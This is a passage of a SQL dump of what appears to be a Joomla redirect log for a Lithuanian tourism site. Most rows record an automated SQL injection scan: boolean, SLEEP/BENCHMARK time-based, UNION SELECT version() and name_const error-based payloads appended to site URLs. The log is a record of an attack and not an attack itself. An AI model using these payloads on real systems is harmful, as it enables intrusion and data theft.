03:45:07','0000-00-00 00:00:00'),(2692,'http://www.infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/images/4 page.jpg','','','',5,0,'2019-03-19 03:21:24','0000-00-00 00:00:00'),(2693,'http://www.infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/images/5 page.jpg','','','',6,0,'2019-03-19 06:00:21','0000-00-00 00:00:00'),(2694,'http://www.infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/images/6 page.jpg','','','',5,0,'2019-03-19 06:54:56','0000-00-00 00:00:00'),(2695,'http://www.infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/images/1 page.jpg','','','',5,0,'2019-03-19 16:19:24','0000-00-00 00:00:00'),(2696,'http://www.infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/images/3 page.jpg','','','',5,0,'2019-03-19 20:59:30','0000-00-00 00:00:00'),(2697,'http://www.infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/images/7 page.jpg','','','',6,0,'2019-03-19 21:45:41','0000-00-00 00:00:00'),(2698,'http://www.infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/images/2 page.jpg','','','',5,0,'2019-03-20 01:47:41','0000-00-00 00:00:00'),(2699,'http://infotytuvenai.lt/index.php/lt/?option=com_fireboard','','','',1,0,'2019-03-20 20:38:25','0000-00-00 00:00:00'),(2700,'http://infotytuvenai.lt/index.php/lt/?option=com_easydiscuss','','','',1,0,'2019-03-21 17:51:17','0000-00-00 00:00:00'),(2701,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=3062121121121212.1','','','',1,0,'2019-03-24 21:25:27','0000-00-00 00:00:00'),(2702,'http://infotytuvenai.lt/index.php/lt/?id=306&view=article&option=com_content2121121121212.1','','','',1,0,'2019-03-24 21:25:29','0000-00-00 00:00:00'),(2703,'http://infotytuvenai.lt/index.php/lt/projektai/i-etapas-baznycios-restauravimas2121121121212.1','','','',1,0,'2019-03-24 21:25:28','0000-00-00 00:00:00'),(2704,'http://infotytuvenai.lt/index.php/lt/apie-centra/paslaugos2121121121212.1','','','',1,0,'2019-03-24 21:25:29','0000-00-00 00:00:00'),(2705,'http://infotytuvenai.lt/index.php/lt/apie-centra2121121121212.1','','','',1,0,'2019-03-24 21:25:29','0000-00-00 00:00:00'),(2706,'http://infotytuvenai.lt/index.php/lt/lankytini-objektai/kulturos-paveldo-objektai2121121121212.1','','','',1,0,'2019-03-24 21:25:30','0000-00-00 00:00:00'),(2707,'http://infotytuvenai.lt/index.php/lt/turizmo-informacija/aktyvus-poilsis2121121121212.1','','','',1,0,'2019-03-24 21:25:29','0000-00-00 00:00:00'),(2708,'http://infotytuvenai.lt/index.php/lt/maitinimas2121121121212.1','','','',1,0,'2019-03-24 21:25:30','0000-00-00 00:00:00'),(2709,'http://infotytuvenai.lt/index.php/lt/projektai/i-etapas-baznycios-restauravimas and 1=1','','','',1,0,'2019-03-24 21:25:30','0000-00-00 00:00:00'),(2710,'http://infotytuvenai.lt/index.php/lt/?id=306&view=article&option=com_content and 1=1','','','',1,0,'2019-03-24 21:25:31','0000-00-00 00:00:00'),(2711,'http://infotytuvenai.lt/index.php/lt/maitinimas/maitinimo-meniu2121121121212.1','','','',1,0,'2019-03-24 21:25:30','0000-00-00 00:00:00'),(2712,'http://infotytuvenai.lt/index.php/lt/apie-centra and 1=1','','','',1,0,'2019-03-24 21:25:31','0000-00-00 00:00:00'),(2713,'http://infotytuvenai.lt/index.php/lt/lankytini-objektai/kulturos-paveldo-objektai and 1=1','','','',1,0,'2019-03-24 21:25:31','0000-00-00 00:00:00'),(2714,'http://infotytuvenai.lt/index.php/lt/apie-centra/paslaugos and 1=1','','','',1,0,'2019-03-24 21:25:31','0000-00-00 00:00:00'),(2715,'http://infotytuvenai.lt/index.php/lt/maitinimas and 1=1','','','',1,0,'2019-03-24 21:25:32','0000-00-00 00:00:00'),(2716,'http://infotytuvenai.lt/index.php/lt/?id=306&view=article&option=com_content and 1>1','','','',1,0,'2019-03-24 21:25:33','0000-00-00 00:00:00'),(2717,'http://infotytuvenai.lt/index.php/lt/turizmo-informacija/aktyvus-poilsis and 1=1','','','',1,0,'2019-03-24 21:25:32','0000-00-00 00:00:00'),(2718,'http://infotytuvenai.lt/index.php/lt/maitinimas/maitinimo-meniu and 1=1','','','',1,0,'2019-03-24 21:25:33','0000-00-00 00:00:00'),(2719,'http://infotytuvenai.lt/index.php/lt/projektai/i-etapas-baznycios-restauravimas and 1>1','','','',1,0,'2019-03-24 21:25:33','0000-00-00 00:00:00'),(2720,'http://infotytuvenai.lt/index.php/lt/apie-centra and 1>1','','','',1,0,'2019-03-24 21:25:33','0000-00-00 00:00:00'),(2721,'http://infotytuvenai.lt/index.php/lt/lankytini-objektai/kulturos-paveldo-objektai and 1>1','','','',1,0,'2019-03-24 21:25:34','0000-00-00 00:00:00'),(2722,'http://infotytuvenai.lt/index.php/lt/apie-centra/paslaugos and 1>1','','','',1,0,'2019-03-24 21:25:34','0000-00-00 00:00:00'),(2723,'http://infotytuvenai.lt/index.php/lt/?id=306&view=article&option=com_content\' and \'x\'=\'x','','','',1,0,'2019-03-24 21:25:34','0000-00-00 00:00:00'),(2724,'http://infotytuvenai.lt/index.php/lt/lankytini-objektai/kulturos-paveldo-objektai\' and \'x\'=\'x','','','',1,0,'2019-03-24 21:25:35','0000-00-00 00:00:00'),(2725,'http://infotytuvenai.lt/index.php/lt/apie-centra/ekskursijos2121121121212.1','','','',1,0,'2019-03-24 21:25:35','0000-00-00 00:00:00'),(2726,'http://infotytuvenai.lt/index.php/lt/?id=306&view=article&option=com_content\' and \'x\'=\'y','','','',1,0,'2019-03-24 21:25:35','0000-00-00 00:00:00'),(2727,'http://infotytuvenai.lt/index.php/lt/apie-centra\' and \'x\'=\'x','','','',1,0,'2019-03-24 21:25:35','0000-00-00 00:00:00'),(2728,'http://infotytuvenai.lt/index.php/lt/apie-centra/paslaugos\' and \'x\'=\'x','','','',1,0,'2019-03-24 21:25:36','0000-00-00 00:00:00'),(2729,'http://infotytuvenai.lt/index.php/lt/projektai/i-etapas-baznycios-restauravimas\' and \'x\'=\'x','','','',1,0,'2019-03-24 21:25:36','0000-00-00 00:00:00'),(2730,'http://infotytuvenai.lt/index.php/lt/lankytini-objektai/kulturos-paveldo-objektai\' and \'x\'=\'y','','','',1,0,'2019-03-24 21:25:36','0000-00-00 00:00:00'),(2731,'http://infotytuvenai.lt/index.php/lt/maitinimas/maitinimo-meniu and 1>1','','','',1,0,'2019-03-24 21:25:35','0000-00-00 00:00:00'),(2732,'http://infotytuvenai.lt/index.php/lt/turizmo-informacija/aktyvus-poilsis and 1>1','','','',1,0,'2019-03-24 21:25:36','0000-00-00 00:00:00'),(2733,'http://infotytuvenai.lt/index.php/lt/apie-centra/ekskursijos and 1=1','','','',1,0,'2019-03-24 21:25:37','0000-00-00 00:00:00'),(2734,'http://infotytuvenai.lt/index.php/lt/?id=306&view=article&option=com_content\" and \"x\"=\"y','','','',1,0,'2019-03-24 21:25:37','0000-00-00 00:00:00'),(2735,'http://infotytuvenai.lt/index.php/lt/apie-centra\' and \'x\'=\'y','','','',1,0,'2019-03-24 21:25:37','0000-00-00 00:00:00'),(2736,'http://infotytuvenai.lt/index.php/lt/apie-centra/paslaugos\' and \'x\'=\'y','','','',1,0,'2019-03-24 21:25:38','0000-00-00 00:00:00'),(2737,'http://infotytuvenai.lt/index.php/lt/maitinimas/maitinimo-meniu\' and \'x\'=\'x','','','',1,0,'2019-03-24 21:25:38','0000-00-00 00:00:00'),(2738,'http://infotytuvenai.lt/index.php/lt/projektai/i-etapas-baznycios-restauravimas\' and \'x\'=\'y','','','',1,0,'2019-03-24 21:25:39','0000-00-00 00:00:00'),(2739,'http://infotytuvenai.lt/index.php/lt/lankytini-objektai/kulturos-paveldo-objektai\" and \"x\"=\"y','','','',1,0,'2019-03-24 21:25:39','0000-00-00 00:00:00'),(2740,'http://infotytuvenai.lt/index.php/lt/turizmo-informacija/aktyvus-poilsis\' and \'x\'=\'x','','','',1,0,'2019-03-24 21:25:39','0000-00-00 00:00:00'),(2741,'http://infotytuvenai.lt/index.php/lt/apie-centra/paslaugos\" and \"x\"=\"y','','','',1,0,'2019-03-24 21:25:41','0000-00-00 00:00:00'),(2742,'http://infotytuvenai.lt/index.php/lt/lankytini-objektai/kulturos-paveldo-objektai999999.1 union select unhex(hex(version())) -- and 1=1','','','',1,0,'2019-03-24 21:25:41','0000-00-00 00:00:00'),(2743,'http://infotytuvenai.lt/index.php/lt/?id=306&view=article&option=com_content\' AnD sLeep(3) ANd \'1','','','',1,0,'2019-03-24 21:25:41','0000-00-00 00:00:00'),(2744,'http://infotytuvenai.lt/index.php/lt/apie-centra\" and \"x\"=\"y','','','',1,0,'2019-03-24 21:25:41','0000-00-00 00:00:00'),(2745,'http://infotytuvenai.lt/index.php/lt/projektai/i-etapas-baznycios-restauravimas\" and \"x\"=\"y','','','',1,0,'2019-03-24 21:25:41','0000-00-00 00:00:00'),(2746,'http://infotytuvenai.lt/index.php/lt/maitinimas/maitinimo-meniu\' and \'x\'=\'y','','','',1,0,'2019-03-24 21:25:40','0000-00-00 00:00:00'),(2747,'http://infotytuvenai.lt/index.php/lt/turizmo-informacija/aktyvus-poilsis\' and \'x\'=\'y','','','',1,0,'2019-03-24 21:25:41','0000-00-00 00:00:00'),(2748,'http://infotytuvenai.lt/index.php/lt/lankytini-objektai/kulturos-paveldo-objektai99999\' union select unhex(hex(version())) -- \'x\'=\'x','','','',1,0,'2019-03-24 21:25:43','0000-00-00 00:00:00'),(2749,'http://infotytuvenai.lt/index.php/lt/maitinimas999999.1 union select unhex(hex(version())) -- and 1=1','','','',1,0,'2019-03-24 21:25:42','0000-00-00 00:00:00'),(2750,'http://infotytuvenai.lt/index.php/lt/?id=306&view=article&option=com_content\'&&sLEEp(3)&&\'1','','','',1,0,'2019-03-24 21:25:43','0000-00-00 00:00:00'),(2751,'http://infotytuvenai.lt/index.php/lt/apie-centra999999.1 union select unhex(hex(version())) -- and 1=1','','','',1,0,'2019-03-24 21:25:43','0000-00-00 00:00:00'),(2752,'http://infotytuvenai.lt/index.php/lt/apie-centra/paslaugos999999.1 union select unhex(hex(version())) -- and 1=1','','','',1,0,'2019-03-24 21:25:42','0000-00-00 00:00:00'),(2753,'http://infotytuvenai.lt/index.php/lt/projektai/i-etapas-baznycios-restauravimas999999.1 union select unhex(hex(version())) -- and 1=1','','','',1,0,'2019-03-24 21:25:44','0000-00-00 00:00:00'),(2754,'http://infotytuvenai.lt/index.php/lt/maitinimas/maitinimo-meniu\" and \"x\"=\"y','','','',1,0,'2019-03-24 21:25:44','0000-00-00 00:00:00'),(2755,'http://infotytuvenai.lt/index.php/lt/?id=306&view=article&option=com_content\0\'||SLeeP(3)&&\'1','','','',1,0,'2019-03-24 21:25:45','0000-00-00 00:00:00'),(2756,'http://infotytuvenai.lt/index.php/lt/lankytini-objektai/kulturos-paveldo-objektai99999\" union select unhex(hex(version())) -- \"x\"=\"x','','','',1,0,'2019-03-24 21:25:45','0000-00-00 00:00:00'),(2757,'http://infotytuvenai.lt/index.php/lt/apie-centra99999\' union select unhex(hex(version())) -- \'x\'=\'x','','','',1,0,'2019-03-24 21:25:45','0000-00-00 00:00:00'),(2758,'http://infotytuvenai.lt/index.php/lt/turizmo-informacija/aktyvus-poilsis\" and \"x\"=\"y','','','',1,0,'2019-03-24 21:25:45','0000-00-00 00:00:00'),(2759,'http://infotytuvenai.lt/index.php/lt/?id=306&view=article&option=com_content\' aND BeNChMaRK(2999999,Md5(NoW())) AnD \'1','','','',1,0,'2019-03-24 21:25:46','0000-00-00 00:00:00'),(2760,'http://infotytuvenai.lt/index.php/lt/lankytini-objektai/kulturos-paveldo-objektai or (1,2)=(select*from(select name_const(CHAR(109,84,84,79,101,75,69,119,112),1),name_const(CHAR(109,84,84,79,101,75,69,119,112),1))a) -- and 1=1','','','',1,0,'2019-03-24 21:25:46','0000-00-00 00:00:00'),(2761,'http://infotytuvenai.lt/index.php/lt/projektai/i-etapas-baznycios-restauravimas99999\' union select unhex(hex(version())) -- \'x\'=\'x','','','',1,0,'2019-03-24 21:25:46','0000-00-00 00:00:00'),(2762,'http://infotytuvenai.lt/index.php/lt/apie-centra/paslaugos99999\' union select unhex(hex(version())) -- \'x\'=\'x','','','',1,0,'2019-03-24 21:25:45','0000-00-00 00:00:00'),(2763,'http://infotytuvenai.lt/index.php/lt/apie-centra/ekskursijos999999.1 union select unhex(hex(version())) -- and 1=1','','','',1,0,'2019-03-24 21:25:46','0000-00-00 00:00:00'),(2764,'http://infotytuvenai.lt/index.php/lt/maitinimas/maitinimo-meniu999999.1 union select unhex(hex(version())) -- and 1=1','','','',1,0,'2019-03-24 21:25:46','0000-00-00 00:00:00'),(2765,'http://infotytuvenai.lt/index.php/lt/apie-centra99999\" union select unhex(hex(version())) -- \"x\"=\"x','','','',1,0,'2019-03-24 21:25:47','0000-00-00 00:00:00'),(2766,'http://infotytuvenai.lt/index.php/lt/?id=306&view=article&option=com_content\'&&BeNChMaRK(2999999,mD5(NOW()))&&\'1','','','',1,0,'2019-03-24 21:25:48','0000-00-00 00:00:00'),(2767,'http://infotytuvenai.lt/index.php/lt/lankytini-objektai/kulturos-paveldo-objektai\' or (1,2)=(select*from(select name_const(CHAR(109,84,84,79,101,75,69,119,112),1),name_const(CHAR(109,84,84,79,101,75,69,119,112),1))a) -- \'x\'=\'x','','','',1,0,'2019-03-24 21:25:48','0000-00-00 00:00:00'),(2768,'http://infotytuvenai.lt/index.php/lt/projektai/i-etapas-baznycios-restauravimas99999\" union select unhex(hex(version())) -- \"x\"=\"x','','','',1,0,'2019-03-24 21:25:48','0000-00-00 00:00:00'),(2769,'http://infotytuvenai.lt/index.php/lt/apie-centra/paslaugos99999\" union select unhex(hex(version())) -- \"x\"=\"x','','','',1,0,'2019-03-24 21:25:48','0000-00-00 00:00:00'),(2770,'http://infotytuvenai.lt/index.php/lt/maitinimas or (1,2)=(select*from(select name_const(CHAR(116,110,112,68,70,85,87,109,86,120),1),name_const(CHAR(116,110,112,68,70,85,87,109,86,120),1))a) -- and 1=1','','','',1,0,'2019-03-24 21:25:49','0000-00-00 00:00:00'),(2771,'http://infotytuvenai.lt/index.php/lt/turizmo-informacija/aktyvus-poilsis999999.1 union select unhex(hex(version())) -- and 1=1','','','',1,0,'2019-03-24 21:25:48','0000-00-00 00:00:00'),(2772,'http://infotytuvenai.lt/index.php/lt/maitinimas/maitinimo-meniu99999\' union select unhex(hex(version())) -- \'x\'=\'x','','','',1,0,'2019-03-24 21:25:48','0000-00-00 00:00:00'),(2773,'http://infotytuvenai.lt/index.php/lt/apie-centra or (1,2)=(select*from(select name_const(CHAR(101,67,119,122,104,78,120,101,110,88,113),1),name_const(CHAR(101,67,119,122,104,78,120,101,110,88,113),1))a) -- and 1=1','','','',1,0,'2019-03-24 21:25:49','0000-00-00 00:00:00'),(2774,'http://infotytuvenai.lt/index.php/lt/?id=306&view=article&option=com_content999999.1 union select unhex(hex(version())) -- and 1=1','','','',1,0,'2019-03-24 21:25:49','0000-00-00 00:00:00'),(2775,'http://infotytuvenai.lt/index.php/lt/lankytini-objektai/kulturos-paveldo-objektai\" or (1,2)=(select*from(select name_const(CHAR(109,84,84,79,101,75,69,119,112),1),name_const(CHAR(109,84,84,79,101,75,69,119,112),1))a) -- \"x\"=\"x','','','',1,0,'2019-03-24 21:25:49','0000-00-00 00:00:00'),(2776,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=3061111111111111 UNION SELECT CHAR(45,120,49,45,81,45) --  /*','','','',1,0,'2019-03-24 21:25:50','0000-00-00 00:00:00'),(2777,'http://infotytuvenai.lt/index.php/lt/projektai/i-etapas-baznycios-restauravimas or (1,2)=(select*from(select name_const(CHAR(121,115,87,110,87,78,104,108,76),1),name_const(CHAR(121,115,87,110,87,78,104,108,76),1))a) -- and 1=1','','','',1,0,'2019-03-24 21:25:50','0000-00-00 00:00:00'),(2778,'http://infotytuvenai.lt/index.php/lt/?id=306&view=article&option=com_content99999\' union select unhex(hex(version())) -- \'x\'=\'x','','','',1,0,'2019-03-24 21:25:51','0000-00-00 00:00:00'),(2779,'http://infotytuvenai.lt/index.php/lt/turizmo-informacija/aktyvus-poilsis99999\' union select unhex(hex(version())) -- \'x\'=\'x','','','',1,0,'2019-03-24 21:25:50','0000-00-00 00:00:00'),(2780,'http://infotytuvenai.lt/index.php/lt/apie-centra\' or (1,2)=(select*from(select name_const(CHAR(101,67,119,122,104,78,120,101,110,88,113),1),name_const(CHAR(101,67,119,122,104,78,120,101,110,88,113),1))a) -- \'x\'=\'x','','','',1,0,'2019-03-24 21:25:51','0000-00-00 00:00:00'),(2781,'http://infotytuvenai.lt/index.php/lt/apie-centra/paslaugos or (1,2)=(select*from(select name_const(CHAR(98,100,85,76,85,117,81,99,79,85,112,84),1),name_const(CHAR(98,100,85,76,85,117,81,99,79,85,112,84),1))a) -- and 1=1','','','',1,0,'2019-03-24 21:25:51','0000-00-00 00:00:00'),(2782,'http://infotytuvenai.lt/index.php/lt/maitinimas/maitinimo-meniu99999\" union select unhex(hex(version())) -- \"x\"=\"x','','','',1,0,'2019-03-24 21:25:51','0000-00-00 00:00:00'),(2783,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=3061111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45) --  /*','','','',1,0,'2019-03-24 21:25:52','0000-00-00 00:00:00'),(2784,'http://infotytuvenai.lt/index.php/lt/?id=306&view=article&option=com_content99999\" union select unhex(hex(version())) -- \"x\"=\"x','','','',1,0,'2019-03-24 21:25:52','0000-00-00 00:00:00'),(2785,'http://infotytuvenai.lt/index.php/lt/projektai/i-etapas-baznycios-restauravimas\' or (1,2)=(select*from(select name_const(CHAR(121,115,87,110,87,78,104,108,76),1),name_const(CHAR(121,115,87,110,87,78,104,108,76),1))a) -- \'x\'=\'x','','','',1,0,'2019-03-24 21:25:52','0000-00-00 00:00:00'),(2786,'http://infotytuvenai.lt/index.php/lt/apie-centra/ekskursijos or (1,2)=(select*from(select name_const(CHAR(78,104,109,103,71,82,71,74,80,122,76),1),name_const(CHAR(78,104,109,103,71,82,71,74,80,122,76),1))a) -- and 1=1','','','',1,0,'2019-03-24 21:25:52','0000-00-00 00:00:00'),(2787,'http://infotytuvenai.lt/index.php/lt/apie-centra\" or (1,2)=(select*from(select name_const(CHAR(101,67,119,122,104,78,120,101,110,88,113),1),name_const(CHAR(101,67,119,122,104,78,120,101,110,88,113),1))a) -- \"x\"=\"x','','','',1,0,'2019-03-24 21:25:53','0000-00-00 00:00:00'),(2788,'http://infotytuvenai.lt/index.php/lt/?id=306&view=article&option=com_content or (1,2)=(select*from(select name_const(CHAR(107,97,103,89,99,118,98,77,86),1),name_const(CHAR(107,97,103,89,99,118,98,77,86),1))a) -- and 1=1','','','',1,0,'2019-03-24 21:25:53','0000-00-00 00:00:00'),(2789,'http://infotytuvenai.lt/index.php/lt/turizmo-informacija/aktyvus-poilsis99999\" union select unhex(hex(version())) -- \"x\"=\"x','','','',1,0,'2019-03-24 21:25:52','0000-00-00 00:00:00'),(2790,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=3061111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45) --  /*','','','',1,0,'2019-03-24 21:25:53','0000-00-00 00:00:00'),(2791,'http://infotytuvenai.lt/index.php/lt/projektai/i-etapas-baznycios-restauravimas\" or (1,2)=(select*from(select name_const(CHAR(121,115,87,110,87,78,104,108,76),1),name_const(CHAR(121,115,87,110,87,78,104,108,76),1))a) -- \"x\"=\"x','','','',1,0,'2019-03-24 21:25:53','0000-00-00 00:00:00'),(2792,'http://infotytuvenai.lt/index.php/lt/apie-centra/paslaugos\' or (1,2)=(select*from(select name_const(CHAR(98,100,85,76,85,117,81,99,79,85,112,84),1),name_const(CHAR(98,100,85,76,85,117,81,99,79,85,112,84),1))a) -- \'x\'=\'x','','','',1,0,'2019-03-24 21:25:53','0000-00-00 00:00:00'),(2793,'http://infotytuvenai.lt/index.php/lt/maitinimas/maitinimo-meniu or (1,2)=(select*from(select name_const(CHAR(77,73,80,82,89,101,102,107,106,83),1),name_const(CHAR(77,73,80,82,89,101,102,107,106,83),1))a) -- and 1=1','','','',1,0,'2019-03-24 21:25:53','0000-00-00 00:00:00'),(2794,'http://infotytuvenai.lt/index.php/lt/?id=306&view=article&option=com_content\' or (1,2)=(select*from(select name_const(CHAR(107,97,103,89,99,118,98,77,86),1),name_const(CHAR(107,97,103,89,99,118,98,77,86),1))a) -- \'x\'=\'x','','','',1,0,'2019-03-24 21:25:54','0000-00-00 00:00:00'),(2795,'http://infotytuvenai.lt/index.php/lt/?id=306&view=article&option=com_content\" or (1,2)=(select*from(select name_const(CHAR(107,97,103,89,99,118,98,77,86),1),name_const(CHAR(107,97,103,89,99,118,98,77,86),1))a) -- \"x\"=\"x','','','',1,0,'2019-03-24 21:25:54','0000-00-00 00:00:00'),(2796,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=3061111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45) --  /*','','','',1,0,'2019-03-24 21:25:54','0000-00-00 00:00:00'),(2797,'http://infotytuvenai.lt/index.php/lt/apie-centra/paslaugos\" or (1,2)=(select*from(select name_const(CHAR(98,100,85,76,85,117,81,99,79,85,112,84),1),name_const(CHAR(98,100,85,76,85,117,81,99,79,85,112,84),1))a) -- \"x\"=\"x','','','',1,0,'2019-03-24 21:25:54','0000-00-00 00:00:00'),(2798,'http://infotytuvenai.lt/index.php/lt/turizmo-informacija/aktyvus-poilsis or (1,2)=(select*from(select name_const(CHAR(77,117,78,104,67,74,110,75,99),1),name_const(CHAR(77,117,78,104,67,74,110,75,99),1))a) -- and 1=1','','','',1,0,'2019-03-24 21:25:55','0000-00-00 00:00:00'),(2799,'http://infotytuvenai.lt/index.php/lt/maitinimas/maitinimo-meniu\' or (1,2)=(select*from(select name_const(CHAR(77,73,80,82,89,101,102,107,106,83),1),name_const(CHAR(77,73,80,82,89,101,102,107,106,83),1))a) -- \'x\'=\'x','','','',1,0,'2019-03-24 21:25:55','0000-00-00 00:00:00'),(2800,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=3061111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45) --  /*','','','',1,0,'2019-03-24 21:25:55','0000-00-00 00:00:00'),(2801,'http://infotytuvenai.lt/index.php/lt/turizmo-informacija/aktyvus-poilsis\' or (1,2)=(select*from(select name_const(CHAR(77,117,78,104,67,74,110,75,99),1),name_const(CHAR(77,117,78,104,67,74,110,75,99),1))a) -- \'x\'=\'x','','','',1,0,'2019-03-24 21:25:56','0000-00-00 00:00:00'),(2802,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=3061111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45) --','','','',1,0,'2019-03-24 21:25:56','0000-00-00 00:00:00'),(2803,'http://infotytuvenai.lt/index.php/lt/maitinimas/maitinimo-meniu\" or (1,2)=(select*from(select name_const(CHAR(77,73,80,82,89,101,102,107,106,83),1),name_const(CHAR(77,73,80,82,89,101,102,107,106,83),1))a) -- \"x\"=\"x','','','',1,0,'2019-03-24 21:25:56','0000-00-00 00:00:00'),(2804,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=3061111111111111 UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CH','','','',1,0,'2019-03-24 21:25:57','0000-00-00 00:00:00'),(2805,'http://infotytuvenai.lt/index.php/lt/turizmo-informacija/aktyvus-poilsis\" or (1,2)=(select*from(select name_const(CHAR(77,117,78,104,67,74,110,75,99),1),name_const(CHAR(77,117,78,104,67,74,110,75,99),1))a) -- \"x\"=\"x','','','',1,0,'2019-03-24 21:25:56','0000-00-00 00:00:00'),(2824,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=3061111111111111\' UNION SELECT CHAR(45,120,49,45,81,45) -- /* order by \'as /*','','','',1,0,'2019-03-24 21:26:04','0000-00-00 00:00:00'),(2825,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=3061111111111111\' UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45) -- /* order by \'as /*','','','',1,0,'2019-03-24 21:26:04','0000-00-00 00:00:00'),(2826,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=3061111111111111\' UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45) -- /* order by \'as /*','','','',1,0,'2019-03-24 21:26:04','0000-00-00 00:00:00'),(2827,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=3061111111111111\' UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45) -- /* order by \'as /*','','','',1,0,'2019-03-24 21:26:05','0000-00-00 00:00:00'),(2828,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=3061111111111111\' UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45) -- /* order by \'as /*','','','',1,0,'2019-03-24 21:26:05','0000-00-00 00:00:00'),(2829,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=3061111111111111\' UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45) -','','','',1,0,'2019-03-24 21:26:05','0000-00-00 00:00:00'),(2830,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=3061111111111111\' UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),C','','','',1,0,'2019-03-24 21:26:06','0000-00-00 00:00:00'),(2849,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=3061111111111111\" UNION SELECT CHAR(45,120,49,45,81,45) -- /* order by \"as /*','','','',1,0,'2019-03-24 21:26:12','0000-00-00 00:00:00'),(2850,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=3061111111111111\" UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45) -- /* order by \"as /*','','','',1,0,'2019-03-24 21:26:12','0000-00-00 00:00:00'),(2851,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=3061111111111111\" UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45) -- /* order by \"as /*','','','',1,0,'2019-03-24 21:26:12','0000-00-00 00:00:00'),(2852,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=3061111111111111\" UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45) -- /* order by \"as /*','','','',1,0,'2019-03-24 21:26:13','0000-00-00 00:00:00'),(2853,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=3061111111111111\" UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45) -- /* order by \"as /*','','','',1,0,'2019-03-24 21:26:13','0000-00-00 00:00:00'),(2854,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=3061111111111111\" UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45) -','','','',1,0,'2019-03-24 21:26:13','0000-00-00 00:00:00'),(2855,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=3061111111111111\" UNION SELECT CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),C','','','',1,0,'2019-03-24 21:26:14','0000-00-00 00:00:00'),(2874,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=306999999.1 union select unhex(hex(version())) -- and 1=1','','','',1,0,'2019-03-24 21:26:26','0000-00-00 00:00:00'),(2875,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=30699999\' union select unhex(hex(version())) -- \'x\'=\'x','','','',1,0,'2019-03-24 21:26:26','0000-00-00 00:00:00'),(2876,'http://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=30699999\" union select unhex(hex(version())) -- \"x\"=\"x','','','',1,0,'2019-03-24 21:26:26','0000-00-00 